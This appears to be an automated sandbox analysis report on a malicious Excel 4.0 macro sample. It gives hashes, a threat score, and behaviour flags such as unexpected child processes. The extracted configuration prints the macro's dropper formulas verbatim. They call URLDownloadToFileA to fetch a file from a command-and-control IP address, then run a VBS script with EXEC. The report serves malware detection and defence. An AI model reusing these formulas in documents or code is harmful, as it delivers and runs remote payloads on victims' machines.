General

  • Target

    05a3f7b2b4af6e5375780a9f77a84391

  • Size

    6KB

  • Sample

    231221-1n65aabdg8

  • MD5

    05a3f7b2b4af6e5375780a9f77a84391

  • SHA1

    1440fdff91fd25e0596260e8f616c433ab6ffaef

  • SHA256

    ca21cd7283ef1796267eeec83262a8e0c4fdda59ea5ba51e26828c49b316876e

  • SHA512

    9d7a4ac7089b6d76fd4c643794a301fba188540944f3b1c47b7e8817a1164aaeacf1a758759d62bb09485fdd031d9762b84585d4ecdda52efd951bd721938324

  • SSDEEP

    192:NDSeuScbrA2OmmfRv8UhHFBFYuBb98y7K+t:NJupM2w11FY8b98y79

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
    =EXEC("wscript C:\zer\spp.vbs")
    =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      05a3f7b2b4af6e5375780a9f77a84391

    • Size

      6KB

    • MD5

      05a3f7b2b4af6e5375780a9f77a84391

    • SHA1

      1440fdff91fd25e0596260e8f616c433ab6ffaef

    • SHA256

      ca21cd7283ef1796267eeec83262a8e0c4fdda59ea5ba51e26828c49b316876e

    • SHA512

      9d7a4ac7089b6d76fd4c643794a301fba188540944f3b1c47b7e8817a1164aaeacf1a758759d62bb09485fdd031d9762b84585d4ecdda52efd951bd721938324

    • SSDEEP

      192:NDSeuScbrA2OmmfRv8UhHFBFYuBb98y7K+t:NJupM2w11FY8b98y79

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks